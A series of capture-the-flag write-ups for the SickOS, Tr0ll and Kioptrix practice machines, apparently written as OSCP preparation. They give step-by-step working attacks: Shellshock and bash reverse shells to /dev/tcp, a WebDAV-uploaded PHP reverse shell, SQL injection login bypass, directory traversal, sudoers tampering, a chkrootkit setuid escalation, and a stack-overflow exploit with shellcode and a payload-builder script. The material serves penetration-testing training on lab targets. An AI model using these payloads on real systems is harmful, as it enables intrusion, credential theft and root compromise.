SickOS Write-Up

What follows is a write-up of two vulnerable machines, SickOS 1.1 and SickOS 1.2.

SickOS was inspired by the OSCP labs.

The goal is simple: compromise the system and get root.

[*] STATUS: COMPLETED

SickOS 1.1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy

Port 80 does not show up in the scan; the only HTTP-related service exposed directly is the Squid proxy.

Time to do some research.
'''

2) Start Metasploit -> search squid
3) use auxiliary/scanner/http/squid_pivot_scanning -> show options
4) set RANGE 192.168.189.208 -> set RHOSTS 192.168.189.208 -> set RPORT 3128
5) exploit
# The scanner confirms that port 80 on the target, which is not exposed directly, is reachable through the Squid proxy on 3128

6) nikto -h 192.168.189.208 -useproxy 192.168.189.208:3128
'''
Checking for vulnerabilities; the shellshock vulnerability might be our way in

+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
'''

7) Open Burp Proxy with Intercept On
8) In Burp: User options -> Upstream Proxy Servers
Destination host: 192.168.189.208
Proxy host: 192.168.189.208
Proxy port: 3128

9) Browse to: 192.168.189.208/cgi-bin/status
10) Modify User-Agent with: () { :;}; /bin/bash -i >& /dev/tcp/192.168.189.130/443 0>&1
# A listener must already be waiting on our machine, e.g. nc -nlvp 443 on 192.168.189.130
# Wait a bit, it takes a while

11) cd /var/www
12) file wolfcms -> cd wolfcms -> ls -> cat config.php
'''
Notice the MySQL credentials:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
'''

13) su sickos
# We get an error: su: must be run from a terminal

14) echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
15) python /tmp/asdf.py
# Spawns a pty so that su can prompt for a password
16) su sickos -> password: john@123
# The MySQL password from config.php is reused for the sickos account
17) sudo -s -> password: john@123
18) cd /root
19) ls
20) cat a0216ea4d51874464078c618298b1367.txt

Flag: a0216ea4d51874464078c618298b1367
End-Notes:

Initially I had logged into the wolf cms service with admin:admin, however, it was taking too long to load pages, so I decided to go another way. That might be another method to compromise the system.

 

SickOS 1.2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28

Time to get to work.
'''

2) nikto -h 192.168.189.218
3) wfuzz --hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.218/FUZZ
# "test" and "~" return results

4) Browse to: http://192.168.189.218/test/
5) Start Burp Proxy with Intercept On
6) Refresh the page -> Change the GET request to OPTIONS -> Right-click -> Do Intercept -> Response to this request
# Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
# WebDAV methods are enabled on /test/, and PUT means we can upload our own files there

7) Search for: php reverse shell code
8) wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
9) gedit php-reverse-shell.php
# Adjust IP and port accordingly

10) nc -nlvp 443
11) curl --upload-file php-reverse-shell.php -v --url http://192.168.189.218/test/php-reverse-shell.php --http1.0
# PUT the shell into the writable /test/ directory

12) Refresh the page and click on the file we just uploaded
13) ps aux | grep root
# Checking which services are running as root
14) ls -al /etc/cron*
# Checking which jobs are scheduled

15) Search for: chkrootkit vulnerability
16) Read: https://www.exploit-db.com/exploits/33899/
'''
Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
'''

17) python -c 'import pty; pty.spawn("/bin/bash")'
# Getting a proper shell

Method A: To get root (slow)
18) echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
# Giving ourselves sudo power
# Note: as written this never marks /tmp/update executable (compare step 22 of Method B), and the advisory above requires an executable 'update'
# In theory this should work, but it was taking too long, so I went with Method B
Method B: To get root (fast)
18) cd /tmp/
19) cat << EOF > root.c
#include <unistd.h>

int main(void)
{
    setgid(0);
    setuid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 1;
}
EOF

20) gcc -o root root.c
# Now we have to make ‘update’ interact with this executable

21) cat << EOF > update
#!/bin/bash
chown root /tmp/root
chgrp root /tmp/root
chmod u+s /tmp/root
EOF

22) chmod +x update
23) ls -al
# We're ready to go: once cron runs chkrootkit as root, it executes /tmp/update, which makes /tmp/root setuid root
24) ./root
25) whoami
# We got root
26) cd /root
27) ls
28) cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

Flag: 7d03aaa2bf93d80040f3f22ec6ad9d5a
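
Why does an executable named update in /tmp get run at all? The script below is an added example, not part of the write-up and not chkrootkit's own source. It reproduces the shape of the advisory's bug in a scratch directory: chkrootkit 0.49's slapper() function walks a list of suspicious paths and appends each one it finds with the unquoted assignment file_port=$file_port $i. With file_port empty, the shell reads that line as the command /tmp/update run with an empty variable file_port in its environment. The shell fragment here is my paraphrase of that loop rather than a copy, and it runs as the current user against a temporary directory instead of as root against /tmp. It also shows why Method A above never fires (no execute bit) and what the one-character fix looks like.

```python
"""Reproduce the unquoted-assignment bug behind the chkrootkit 'update' privilege escalation."""
import os
import subprocess
import tempfile

# Paraphrase of the slapper() loop in chkrootkit 0.49 (not the original file).
# ROOTDIR is normally "/" so the path expands to /tmp/update.
VULNERABLE_FRAGMENT = r"""
SLAPPER_FILES="${ROOTDIR}tmp/update"
file_port=
for i in ${SLAPPER_FILES}; do
    if [ -f ${i} ]; then
        # BUG: unquoted. With file_port empty this line becomes
        #   file_port= /tmp/update
        # i.e. "run /tmp/update with file_port set to the empty string".
        file_port=$file_port $i
    fi
done
"""

# The fix is to quote the right-hand side so it is an assignment, not a command.
FIXED_FRAGMENT = VULNERABLE_FRAGMENT.replace(
    "file_port=$file_port $i", 'file_port="$file_port $i"')


def run_slapper(fragment, executable):
    """Plant <tmp>/tmp/update, run the fragment with ROOTDIR=<tmp>/, and report
    whether the planted file was executed (it leaves a marker file behind)."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "tmp"))
        update = os.path.join(root, "tmp", "update")
        marker = os.path.join(root, "tmp", "update.ran")
        with open(update, "w") as fh:
            # Marker is written by a shell redirection, so no external binary is needed.
            fh.write("#!/bin/sh\n: > '%s'\n" % marker)
        if executable:
            os.chmod(update, 0o755)   # what 'chmod +x update' does in step 22
        subprocess.run(["/bin/sh", "-c", fragment],
                       env={"ROOTDIR": root + os.sep, "PATH": "/usr/bin:/bin"},
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return os.path.exists(marker)


def demo():
    """The three outcomes a practitioner would check before relying on the bug."""
    return {
        "vulnerable, update +x": run_slapper(VULNERABLE_FRAGMENT, True),   # runs
        "vulnerable, update -x": run_slapper(VULNERABLE_FRAGMENT, False),  # Method A: nothing
        "fixed, update +x": run_slapper(FIXED_FRAGMENT, True),             # nothing
    }


if __name__ == "__main__":
    for case, ran in demo().items():
        print("%-24s executed=%s" % (case, ran))
```

On the box the same loop runs from root's cron, so the planted file inherits uid 0; here it only proves which combinations of quoting and mode bits cause the file to execute.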
End-Notes:
Very cool box. Note that for the chkrootkit exploit you could have also used Metasploit.

This was the last box I had as training for the OSCP labs. I first completed Kioptrix (1-5), then Tr0ll (1-2), and finally the two sickOS boxes. I’m signing up for the OSCP labs this week and aim to be OSCP certified within 90 days or less.

 

Tr0ll Write-Up

What follows is a write-up of two vulnerable machines, Tr0ll 1 and Tr0ll 2.

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.

The goal is simple, gain root and get Proof.txt from the /root directory.

[*] STATUS: COMPLETED

Tr0ll 1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
ftp vsftpd 3.0.2
ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.4.7 ((Ubuntu))

'''

2) nikto -h 192.168.189.197
# It found a '/secret/' directory mentioned in robots.txt which might be interesting
3) Browse to: 192.168.189.197
# Got trolled. Nice one.
# Let’s try attacking through ftp

4) ftp 192.168.189.197 -> anonymous:anonymous
# We’re in
5) ls -> get lol.pcap -> exit
6) strings lol.pcap
# Note: you almost found the sup3rs3cr3tdirlol 😛
7) Browse to: http://192.168.189.197/sup3rs3cr3tdirlol/
8) Download the binary
9) strings roflmao
# Note: Find address 0x0856BF to proceed
10) Browse to: http://192.168.189.197/0x0856BF/
11) Click on 'good_luck' -> which_one_lol.txt
12) wget http://192.168.189.197/0x0856BF/good_luck/which_one_lol.txt
# A list of candidate usernames
13) Click on 'this_folder_contains_the_password/' -> Pass.txt
# Note: Either 'Pass.txt' or its contents 'Good_job_:)' could be the password
14) medusa -U which_one_lol.txt -p Pass.txt -h 192.168.189.197 -M ssh
# We found our way in: the password really is the filename, Pass.txt
15) ssh overflow@192.168.189.197 -> Pass: Pass.txt
# We're in
16) cat /root/Proof.txt
# Permission denied, we're going to have to do privilege escalation
17) find / -perm -o+w
# Searching for world-writable files
# That /lib/log/cleaner.py file near the end looks interesting
18) vi /lib/log/cleaner.py
Modify the try: block so that it runs
os.system('usermod -aG sudo overflow')

# Initially the modification didn't seem to work, but by the third log on
# (it kept kicking us out) we finally became a sudoer
19) id
# Became a sudoer
20) sudo ls /root
21) sudo cat /root/proof.txt
# Got the flag

Flag: 702a8c18d29c6f3ca0d99ef5712bfbdc

End-Notes:
Pretty funny box, though slightly annoying when it kept logging us out. Fun overall.

 

Tr0ll 2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
ftp vsftpd 2.0.8 or later
ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.2.22 ((Ubuntu))

Also notice that there were two network adapters. Perhaps some chaining?

'''

2) Browse to: 192.168.189.204
3) nikto -h 192.168.189.204
'''
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.

'''

4) wfuzz --hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.204/FUZZ
# Fuzzing for directories; only index came up

5) Browse to: http://192.168.189.204/robots.txt
# robots.txt lists a series of paths; save them to a wordlist and fuzz with that instead

6) wfuzz --hc 404 -c -z file,/root/Documents/wargames/tr0ll/list.txt http://192.168.189.204/FUZZ

'''
Out of all the URLs only the following seem to work:
http://192.168.189.204/noob/
http://192.168.189.204/keep_trying/
http://192.168.189.204/dont_bother/
http://192.168.189.204/ok_this_is_it/

The filename of the images is: cat_the_troll
'''

7) Download all the images
8) tail -n 1 cat_the_troll.jpg cat_the_troll.jpg.1 cat_the_troll.jpg.2 cat_the_troll.jpg.3
# Notice on the third image (dont_bother) we get:
# Look Deep within y0ur_self for the answer

9) Browse to: http://192.168.189.204/y0ur_self/
10) wget http://192.168.189.204/y0ur_self/answer.txt
11) base64 -d answer.txt > the_answer.txt
12) gedit the_answer.txt
# It’s a bunch of repeated words
13) uniq -u the_answer.txt > answerz.txt
14) gedit answerz.txt
# Notice the following string: ItCantReallyBeThisEasyRightLOL
# After trying it on the web app, ftp, and ssh, I decided to move on
15) ftp 192.168.189.204 -> Tr0ll:Tr0ll
# It was this easy

16) ls -> get lmao.zip -> exit
17) unzip lmao.zip
# It’s password encrypted
# The password is: ItCantReallyBeThisEasyRightLOL

18) file noob
# noob: PEM RSA private key
# This might very well be to log in via ssh

19) ssh noob@192.168.189.204 -i noob
# It prints out "TRY HARDER LOL!" and closes the connection
# Looks like it's forcing this command (echo) to be run once we log in

20) Search for 'ssh exploit'
21) Read: http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
# With a forced command, sshd puts whatever command we ask for into the SSH_ORIGINAL_COMMAND environment variable; a Shellshock-vulnerable bash parses that value as a function definition and executes what follows it

22) ssh noob@192.168.189.204 -i noob '() { :;}; /bin/bash'
23) id
# We’re in
24) pwd -> cd ../ -> ls -> ls tr0ll
# There’s a lmao.zip
25) cd / -> ls -> ls nothing_to_see_here -> ls nothing_to_see_here/choose_wisely
26) cd nothing_to_see_here/choose_wisely
27) ls door1 -> ls door2 -> ls door3
28) file door1/r00t -> file door2/r00t -> file door3/r00t
'''
After running all three files, we get the following:
- door1 r00t lets us input data
- door2 prints:
Good job, stand by, executing root shell...
BUHAHAHA NOOB!

- door3 r00t prints: 2 MINUTE HARD MODE LOL, and then bricks the system

Let's go with door1. Binary exploitation?
'''

29) cd door1
30) gdb -q ./r00t
31) run $(python -c 'print "A" * 500')
# We get a segmentation fault
# (These one-liners are Python 2: print is a statement there and writes the bytes out unchanged)
32) run $(python -c 'print "A" * 300')
33) run $(python -c 'print "A" * 200')
34) run $(python -c 'print "A" * 250')
35) run $(python -c 'print "A" * 270')
36) run $(python -c 'print "A" * 268 + "B" * 4')
# EIP is now 0x42424242: we control EIP, and the saved return address sits 268 bytes into the buffer

37) disas main
38) br *main+97
# Setting a breakpoint at leave
39) run $(python -c 'print "A" * 268 + "B" * 4')
40) x/100x $esp
'''
Notice where our A's start
We can now load and run our shellcode: point the return address at a NOP sled placed right after it, and the sled slides execution into the shellcode

Let's use the execve /bin/sh shellcode I wrote, which is 25 bytes in size
'''

41) run $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')
# Confirming it works: "\x80\xfb\xff\xbf" is 0xbffffb80 in little-endian, an address inside the NOP sled on the stack taken from the x/100x $esp output
# gdb's environment can shift stack addresses by a few bytes, which is what the sled absorbs

42) ./r00t $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')

43) whoami
44) cat /root/Proof.txt
# Got the flag

Flag: a70354f0258dcc00292c72aab3c8b1e4
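
The two one-liners in steps 41 and 42 are Python 2, where print emits raw bytes; under Python 3 the same print would UTF-8-encode every byte above 0x7f (0x80 becomes c2 80) and the saved return address would never be what we intended. The script below is an added example, not code from the write-up. It builds the same payload in Python 3 with the write-up's numbers (268 bytes to the saved EIP, return address 0xbffffb80, a 20-byte NOP sled, the 25-byte execve shellcode), refuses any NUL byte because argv[1] is a C string that strcpy-style copies truncate, and goes beyond the write-up's trial-and-error lengths with a pattern_create/pattern_offset pair that finds the offset from a single crash. The function names are mine.

```python
"""Python 3 payload builder for the door1/r00t stack overflow (added example)."""
import string
import struct
import sys

# The 25-byte execve("/bin//sh") shellcode quoted in step 41, annotated.
SHELLCODE = bytes([
    0x31, 0xc0,                          # xor  eax, eax
    0x50,                                # push eax          ; NUL terminator
    0x68, 0x2f, 0x2f, 0x73, 0x68,        # push "//sh"
    0x68, 0x2f, 0x62, 0x69, 0x6e,        # push "/bin"
    0x89, 0xe3,                          # mov  ebx, esp     ; ebx -> "/bin//sh"
    0x50,                                # push eax          ; argv[1] = NULL
    0x53,                                # push ebx          ; argv[0]
    0x89, 0xe1,                          # mov  ecx, esp     ; ecx -> argv
    0x31, 0xd2,                          # xor  edx, edx     ; envp = NULL
    0xb0, 0x0b,                          # mov  al, 11       ; SYS_execve
    0xcd, 0x80,                          # int  0x80
])


def pack_addr(addr):
    """32-bit little-endian, the byte order the x86 stack expects."""
    return struct.pack("<I", addr)


def has_bad_bytes(blob, bad=b"\x00"):
    """argv strings stop at the first NUL, so a NUL anywhere truncates the payload."""
    return any(b in blob for b in bad)


def build_payload(offset=268, ret_addr=0xbffffb80, nop_len=20, shellcode=SHELLCODE):
    """argv[1] that overwrites the saved EIP and lands in a NOP sled.

    Layout, low to high addresses:
        [ 'A' * offset ][ ret_addr ][ NOP * nop_len ][ shellcode ]
    ret_addr must point into the sled; the write-up read it off x/100x $esp.
    """
    ret = pack_addr(ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        if has_bad_bytes(blob):
            raise ValueError("%s contains a NUL byte and cannot be passed via argv" % name)
    return b"A" * offset + ret + b"\x90" * nop_len + shellcode


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1...; every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip, length=1024):
    """Offset of the saved EIP, given the value gdb shows after a crash with
    pattern_create(length) as input (the int gdb prints, or the 4 raw bytes).
    Returns -1 if the value did not come from the pattern."""
    needle = pack_addr(eip) if isinstance(eip, int) else eip
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Usage: ./r00t "$(python3 exploit.py)"   or   python3 exploit.py pattern 500
    if len(sys.argv) > 2 and sys.argv[1] == "pattern":
        sys.stdout.buffer.write(pattern_create(int(sys.argv[2])))
    else:
        # Write raw bytes: print() would re-encode 0x80..0xff as UTF-8.
        sys.stdout.buffer.write(build_payload())
```

One crash with the pattern as input replaces steps 31 to 36: feed the EIP value gdb reports to pattern_offset and it returns 268.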

End-Notes:
Fun box!


Kioptrix Write-Up

What follows is a write-up of several vulnerable machines, Kioptrix #1 through #5.

The object of the game is to acquire root access via any means possible.
The purpose of the games is to practice techniques in vulnerability assessment and exploitation. There are multiple ways to get root access and compromise the system.

These machines are run in a host-only setup, as they are full of vulnerabilities and internet access would be dangerous.

[*] STATUS: COMPLETED

Kioptrix 1 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
'''
Scan for address and open ports

Note the following two services:
Samba smbd
Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

These two could be our way in
'''

2) enum4linux 192.168.189.185
# Note: Server=[Samba 2.2.1a]
3) nikto -h 192.168.189.185
# We find a lot of vulnerabilities

4) Search Google for: Samba 2.2.1 exploit
# The first result is a verified remote execution exploit
5) wget https://www.exploit-db.com/download/10
6) mv 10 samba_228_remote.c
7) gcc -o samba_228_remote samba_228_remote.c
8) ./samba_228_remote
# Prints the usage
9) ./samba_228_remote -b 0 -c 192.168.189.130 192.168.189.185
# -b 0 selects the Linux target for the brute-force, -c is the connect-back address (our machine)
10) whoami
# We got root
11) cat /var/mail/root
# We own this machine

 

Kioptrix 2 Write-Up

1) nmap -sS -sV -Pn 192.168.0.0/24
'''
Scan for address and open ports

Note the following three services:
Apache httpd 2.0.52 ((CentOS))
CUPS 1.1
MySQL (unauthorized)

These three could be our way in
'''

2) Browse to: 192.168.0.20
username: admin
password: ' or '1'='1
# We're in: the quote closes the password string and the injected condition is always true, so the login query matches

3) ping localhost; ls
# The application is vulnerable to command injection

4) nc -n -v -l -p 443
5) In the browser: ping localhost; bash -i >& /dev/tcp/192.168.0.19/443 0>&1
6) id
# We got a shell, but not as a privileged user
7) Search: linux centos exploit
# The second result is for privilege escalation – just what we need

8) cd /tmp
9) wget https://www.exploit-db.com/download/9545 --no-check-certificate
10) mv 9545 centos_escalate.c
# 9545 is a sock_sendpage() (CVE-2009-2692) local root exploit for 2.4/2.6 kernels
11) gcc -o centos_escalate centos_escalate.c
12) ./centos_escalate
13) whoami
# We got root

 

Kioptrix 3 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
2) gedit /etc/hosts
Add:
192.168.189.195 kioptrix3.com

3) Browse to kioptrix3.com
4) Right-click -> View Page Source Code
# Notice the use of LotusCMS
5) Search: lotuscms exploit
# The third result is for eval() remote command execution
# Exploit: https://www.exploit-db.com/exploits/18565/
6) Start Metasploit
7) search LotusCMS
8) use exploit/multi/http/lcms_php_exec
9) options
10) set RHOST 192.168.189.195
11) set URI /
12) exploit
13) ls
# Remember they were talking about the gallery
# Let’s check it out
14) ls gallery
15) cat gallery/gconfig.php
# Notice the MySQL credentials: root:fuckeyou
16) Browse to: http://kioptrix3.com/phpmyadmin/index.php -> Enter the above credentials
17) Gallery -> dev_accounts
# Note the hashes
18) Browse to: https://hashkiller.co.uk/md5-decrypter.aspx
Enter the hash: 5badcaf789d3d1d09794d8f021f40f0e
Result: starwars

19) ssh loneferret@192.168.189.195 -> Enter the password: starwars
20) cat CompanyPolicy.README
# Points us at the ht editor
21) /usr/local/bin/ht
# I got an error: Error opening terminal: xterm-256color
# I solved it by entering: export TERM=xterm
22) sudo /usr/local/bin/ht
# Editing /etc/sudoers needs root, so ht has to run through sudo
23) Fn+F3 -> /etc/sudoers -> Enter
24) Under 'User privilege specification' append /bin/bash to the list of commands loneferret may run with sudo
25) sudo /bin/bash
26) whoami
# We got root
27) cd /root
28) cat Congrats.txt

 

Kioptrix 4 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
'''
Note the following services:
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

They could be our way in.

'''

2) enum4linux -a 192.168.189.196
'''
Note the users:
Account: nobody Name: nobody
Account: robert Name: ,,,
Account: root Name: root
Account: john Name: ,,,
loneferret Name: loneferret,,,

We can try using one of these accounts

'''

3) Browse to: 192.168.189.196
user: robert
pass: ' or '1'='1

# The page echoes the matched row, so we also learn robert's real password: ADGAdsafdfwt4gadfga==
# Since ssh is also on and the web page isn't showing much else, we can try that

4) ssh robert@192.168.189.196
# robert lands in a restricted shell
5) ?
# Lists the few commands the restricted shell allows
6) echo os.system('/bin/bash')
# A known escape from this restricted shell; we get a full bash
7) ps aux | grep root
# Note that MySQL is running with root privileges
8) mysql
9) select sys_exec("echo 'robert ALL=(ALL) ALL' >> /etc/sudoers");
# sys_exec() is a user-defined function that runs a shell command from the MySQL server process, so it runs as root here; we use it to add "our" account to sudoers
10) exit
11) sudo bash
# Authenticate with robert's password from step 3
12) id
# We got root
13) cat /root/congrats.txt
Side-note:
Initially I also searched for “ubuntu 5.6 exploit” and thought of using the following exploit: https://www.exploit-db.com/papers/15311/

That might also be another way in.
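
Both the Kioptrix 2 login (step 2 of that section) and the Kioptrix 4 login (step 3 above) fall to the same input, ' or '1'='1, and Kioptrix 4 even hands back robert's password because the page renders the matched row. The script below is an added example, not code from either machine. It rebuilds that login against an in-memory SQLite table with constructed rows (the robert row reuses the password shown in step 3; the admin password is made up), runs the injected input through a string-built query and through the parameterized form, and returns what each one matches. The table layout and column names are assumptions for the demonstration, not Kioptrix's schema.

```python
"""Login bypass with ' or '1'='1: string-built SQL beside the parameterized fix (added example)."""
import sqlite3

# Constructed sample data; the table layout is an assumption, not Kioptrix's schema.
SAMPLE_USERS = [
    ("admin", "Adm1nPass"),                  # made up for the example
    ("robert", "ADGAdsafdfwt4gadfga=="),     # the password Kioptrix 4 leaked in step 3
]

INJECTION = "' or '1'='1"


def make_db():
    """In-memory users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_query(username, password):
    """The concatenation both boxes use. With the injection in the password
    field the WHERE clause becomes
        username='admin' AND password='' or '1'='1'
    and, because AND binds tighter than OR, it is true for every row."""
    return ("SELECT username, password FROM users "
            "WHERE username='%s' AND password='%s'" % (username, password))


def login_vulnerable(conn, username, password):
    """Returns every row the injected condition matches: the whole table."""
    return conn.execute(vulnerable_query(username, password)).fetchall()


def login_safe(conn, username, password):
    """Bound parameters: the quote in the input stays data, never SQL."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("injected SQL :", vulnerable_query("admin", INJECTION))
    print("vulnerable   :", login_vulnerable(db, "admin", INJECTION))
    print("parameterized:", login_safe(db, "admin", INJECTION))
```

The vulnerable path returns both rows for any username at all, which is exactly how the Kioptrix 4 page ended up printing robert's password; the parameterized path returns nothing for the injected input and only the one row for the real credentials.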

 

Kioptrix 5 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.0.0/24
'''
Note the following:
Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

It's open on both port 80 and port 8080.

'''

2) Browse to: 192.168.0.85
3) Right-click -> View Page Source Code
# Notice: URL=pChart2.1.3/index.php
4) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php
5) Search: pChart2.1.3
6) Read: https://www.exploit-db.com/exploits/31173/
# Let’s try directory traversal
7) Browse to: 192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
# The web app is vulnerable to directory traversal

8) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

'''
Notice at the end of the file:

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

So the 8080 vhost is only served to clients whose User-Agent begins with Mozilla/4.0; everyone else gets a 403. Any User-Agent string starting that way will do.

'''

9) Search: mozilla firefox 4.0 user agent string
10) Browse to: http://www.useragentstring.com/pages/useragentstring.php?name=Firefox
11) Ctrl-F -> mozilla/4.0 -> http://www.useragentstring.com/index.php?id=19040
12) In User Agent Switcher:
Edit User Agents
New
Description: Mozilla FireFox 4.0
User Agent:
Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)

13) Browse to: http://192.168.0.85:8080/
14) Click on ‘phptax’
15) Open Metasploit -> search phptax -> use exploit/multi/http/phptax_exec
16) show options -> set RHOST 192.168.0.85 -> set RPORT 8080 -> exploit
17) id
18) uname -a
# Getting kernel details to figure out how to do privilege escalation

19) Search: FreeBSD 9.0 exploit
# The first result is what we're looking for
# https://www.exploit-db.com/exploits/28718/ (the Intel SYSRET kernel privilege escalation, CVE-2012-0217)

20) wget https://www.exploit-db.com/download/28718
# Downloading it to our machine
21) mv 28718 freeBSD9_priv_esc.c
22) nc -lvp 8888 < freeBSD9_priv_esc.c
# Hosting the exploit on our machine (192.168.0.87)
# We will download the file from the limited shell

23) nc -nv 192.168.0.87 8888 > die.c
24) Stop nc
25) gcc die.c -o die
26) ./die
27) id
# We got root
28) cat /root/congrats.txt
29) cat /root/ossec-alerts.log
'''
For fun, check out how noisy we were during our attack
As the congrats.txt explains, figuring out how to approach and attack the target before actually attacking is extremely important. Otherwise you will make a lot of noise and get caught early on as a result.
'''

 

End-Notes:

Very fun machines to exploit. As the Kioptrix website clearly states, they are intended for beginners, hence they are easy to exploit to the seasoned security tester. A big thanks to loneferret for such fun yet educational challenges!